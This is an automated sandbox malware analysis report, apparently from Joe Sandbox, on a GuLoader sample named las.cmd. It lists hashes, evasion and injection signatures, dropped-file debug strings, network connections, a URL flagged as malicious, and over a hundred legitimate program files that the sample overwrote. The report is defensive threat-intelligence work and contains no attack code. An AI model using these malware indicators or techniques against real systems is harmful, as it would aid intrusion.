Windows Analysis Report
las.cmd

Overview

General Information

Sample name: las.cmd
Analysis ID: 1446786
MD5: f96b390af9be44e21ffec109cb107462
SHA1: 716dda50fc30581e587c0a3d8c65d45aefbfec14
SHA256: c73db3a4bf51b48059eef2a5003feafc43dc7e93bf8c70fb51a0423c212d85a7
Tags: cmd
Infos:

Detection

GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Yara detected GuLoader
Yara detected Powershell download and execute
AI detected suspicious sample
Creates an undocumented autostart registry key
Drops PE files with a suspicious file extension
Drops executable to a common third party application directory
Drops or copies MsMpEng.exe (Windows Defender, likely to bypass HIPS)
Found suspicious powershell code related to unpacking or dynamic code loading
Hides threads from debuggers
Infects executable files (exe, dll, sys, html)
Machine Learning detection for dropped file
Suspicious powershell command line found
Very long command line found
Writes to foreign memory regions
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
PE file contains strange resources
PE file overlay found
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Classes Autorun Keys Modification
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

Name Description Attribution Blogpost URLs Link
CloudEyE, GuLoader CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

AV Detection
barindex
Antivirus detection for URL or domain
Source: http://pesterbdd.com/images/Pester.png URL Reputation: Label: malware
AI detected suspicious sample
Source: Submited Sample Integrated Neural Analysis Model: Matched 98.9% probability
Machine Learning detection for dropped file
Source: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe Joe Sandbox ML: detected
Source: unknown HTTPS traffic detected: 172.67.170.105:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown HTTPS traffic detected: 69.31.136.17:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.170.105:443 -> 192.168.2.4:49738 version: TLS 1.2
Source: unknown HTTPS traffic detected: 69.31.136.57:443 -> 192.168.2.4:49739 version: TLS 1.2
Source: Binary string: D:\a\_work\e\src\out\Release_x64\pwahelper.exe.pdb source: pwahelper.exe.8.dr
Source: Binary string: GoogleUpdate_unsigned.pdb source: GoogleUpdate.exe.8.dr
Source: Binary string: D:\a\_work\e\src\out\Release_x64\elevation_service.exe.pdb source: elevation_service.exe.8.dr
Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\*.* source: wab.exe, 00000008.00000002.2375969322.0000000006288000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: D:\dbs\el\omr\Target\x86\ship\postc2r\x-none\msoev.pdb source: msoev.exe.8.dr
Source: Binary string: d:\dbs\el\omr\target\x86\ship\setupexe\x-none\LicLua.pdb source: LICLUA.EXE.8.dr
Source: Binary string: D:\a\_work\e\src\out\Release_x64\elevation_service.exe.pdbOGP source: elevation_service.exe.8.dr
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.1999294674.0000000008915000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\e\src\out\Release_x64\notification_helper.exe.pdb source: notification_click_helper.exe.8.dr
Source: Binary string: MpDlpCmd.pdbGCTL source: MpDlpCmd.exe.8.dr
Source: Binary string: d:\dbs\el\ja2\target\x86\ship\dw\x-none\dw20.pdb source: DW20.EXE.8.dr
Source: Binary string: D:\a\_work\e\src\out\Release_x64\notification_helper.exe.pdbOGP source: notification_click_helper.exe.8.dr
Source: Binary string: D:\a\_work\e\src\out\Release_x64\ie_to_edge_stub.exe.pdbOGP source: ie_to_edge_stub.exe.8.dr
Source: Binary string: D:\dbs\el\omr\Target\x86\ship\postc2r\x-none\perfboost.pdb source: PerfBoost.exe.8.dr
Source: Binary string: wab.pdbGCTL source: misc.exe1.8.dr, javacpl.exe.8.dr, MpDlpCmd.exe.8.dr, ie_to_edge_stub.exe.8.dr, DW20.EXE.8.dr, Uninstall.exe.8.dr, java.exe.8.dr, grv_icons.exe.8.dr, SCANPST.EXE.8.dr, SETLANG.EXE.8.dr, notification_click_helper.exe.8.dr, AutoIt3Help.exe.8.dr, Au3Info_x64.exe.8.dr, PerfBoost.exe.8.dr, dbcicons.exe.8.dr, GoogleUpdate.exe.8.dr, msoev.exe.8.dr, LICLUA.EXE.8.dr, elevation_service.exe.8.dr, misc.exe0.8.dr, AutoIt3_x64.exe.8.dr, java.exe0.8.dr, accicons.exe.8.dr, MSOICONS.EXE.8.dr, pwahelper.exe.8.dr
Source: Binary string: D:\dbs\el\omr\Target\x86\ship\postc2r\x-none\msoev.pdb00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000S source: msoev.exe.8.dr
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb source: powershell.exe, 00000005.00000002.1992900389.0000000007945000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\deploy\tmp\javacplexec\obj\javacpl.pdb source: javacpl.exe.8.dr
Source: Binary string: wab.pdb source: misc.exe1.8.dr, javacpl.exe.8.dr, MpDlpCmd.exe.8.dr, ie_to_edge_stub.exe.8.dr, DW20.EXE.8.dr, Uninstall.exe.8.dr, java.exe.8.dr, grv_icons.exe.8.dr, SCANPST.EXE.8.dr, SETLANG.EXE.8.dr, notification_click_helper.exe.8.dr, AutoIt3Help.exe.8.dr, Au3Info_x64.exe.8.dr, PerfBoost.exe.8.dr, dbcicons.exe.8.dr, GoogleUpdate.exe.8.dr, msoev.exe.8.dr, LICLUA.EXE.8.dr, elevation_service.exe.8.dr, misc.exe0.8.dr, AutoIt3_x64.exe.8.dr, java.exe0.8.dr, accicons.exe.8.dr, MSOICONS.EXE.8.dr, pwahelper.exe.8.dr
Source: Binary string: D:\dbs\el\omr\Target\x86\ship\postc2r\x-none\scanpst.pdb000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000S source: SCANPST.EXE.8.dr
Source: Binary string: d:\dbs\el\omr\target\x86\ship\setupexe\x-none\LicLua.pdb000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000S source: LICLUA.EXE.8.dr
Source: Binary string: D:\a\_work\e\src\out\Release_x64\pwahelper.exe.pdbOGP source: pwahelper.exe.8.dr
Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\deploy\tmp\javacplexec\obj\javacpl.pdb774 source: javacpl.exe.8.dr
Source: Binary string: MpDlpCmd.pdb source: MpDlpCmd.exe.8.dr
Source: Binary string: d:\dbs\el\ja2\target\x86\ship\dw\x-none\dw20.pdb00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000S source: DW20.EXE.8.dr
Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\java_objs\java.pdb source: java.exe.8.dr, java.exe0.8.dr
Source: Binary string: D:\dbs\el\omr\Target\x86\ship\postc2r\x-none\perfboost.pdbb00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000S source: PerfBoost.exe.8.dr
Source: Binary string: D:\a\_work\e\src\out\Release_x64\ie_to_edge_stub.exe.pdb source: ie_to_edge_stub.exe.8.dr
Source: Binary string: D:\dbs\el\omr\Target\x86\ship\postc2r\x-none\setlang.pdb source: SETLANG.EXE.8.dr
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb@g source: powershell.exe, 00000005.00000002.1999294674.0000000008915000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: D:\dbs\el\omr\Target\x86\ship\postc2r\x-none\scanpst.pdb source: SCANPST.EXE.8.dr
Source: Binary string: D:\dbs\el\omr\Target\x86\ship\postc2r\x-none\setlang.pdb000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000S source: SETLANG.EXE.8.dr

Spreading
barindex
Infects executable files (exe, dll, sys, html)
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Java\jre-1.8\bin\javaws.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\DATABASECOMPARE.EXE Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\UcMapi.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateComRegisterShell64.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\PerfBoost.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MsMpEng.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesX64\Microsoft Office\Office16\MSOHTMED.EXE Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\MSOXMLED.EXE Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\Office16\OSPPREARM.EXE Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MpCopyAccelerator.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-006E-0409-0000-0000000FF1CE}\misc.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\SETLANG.EXE Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-001F-0C0A-0000-0000000FF1CE}\misc.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\lync99.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\FLTLDR.EXE Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\aimgr.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\cookie_exporter.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\filecompare.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\SELFCERT.EXE Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\SCANPST.EXE Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\xlicons.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\ConfigSecurityPolicy.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSREC.EXE Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\ONENOTEM.EXE Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Common Files\Microsoft Shared\VSTO\10.0\VSTOInstaller.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateBroker.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate64.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\msoev.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\accicons.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\lyncicon.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateSetup.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\IEContentService.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Analysis Services\AS OLEDB\140\SQLDumper.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Client\AppVLP.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\wordicon.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\SPREADSHEETCOMPARE.EXE Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\misc.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft\Edge\Application\pwahelper.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\AutoIt3\Au3Check.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\NisSrv.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateBroker.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\pj11icon.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\MSOICONS.EXE Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\misc.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\ONENOTE.EXE Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesX64\Microsoft Office\Office16\AppSharingHookController64.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\visicon.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeComRegisterShellARM64.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\joticon.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\MSOHTMED.EXE Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\SkypeSrv\SKYPESERVER.EXE Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\XLICONS.EXE Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateOnDemand.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Users\user\AppData\Local\Temp\chrome.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-001F-0409-0000-0000000FF1CE}\misc.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MpDlpCmd.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\Common.DBConnection64.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\pptico.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate32.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\outicon.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Java\jre-1.8\bin\jp2launcher.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\dbcicons.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\MSQRY32.EXE Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-001F-040C-0000-0000000FF1CE}\misc.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE16\LICLUA.EXE Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\ORGCHART.EXE Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\SDXHelper.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\osmclienticon.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MpCmdRun.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Integration\Integrator.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\WORDICON.EXE Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\AutoIt3\Aut2Exe\upx.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Java\jre-1.8\bin\unpack200.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\GRAPH.EXE Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\sscicons.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\X86\MpCmdRun.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\Common.DBConnection.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\CNFNOT32.EXE Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\msoadfsb.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\AutoIt3\Au3Info.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\MSOXMLED.EXE Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\mpextms.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\Wordconv.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\ProgramData\Package Cache\{8bdfe669-9705-4184-9368-db9ce581e0e7}\VC_redist.x64.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateCore.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdate.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\VPREVIEW.EXE Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\ProgramData\Microsoft\ClickToRun\{9AC08E99-230B-47e8-9721-4577B7F124EA}\integrator.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\OLCFG.EXE Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\msoasb.exe Jump to behavior
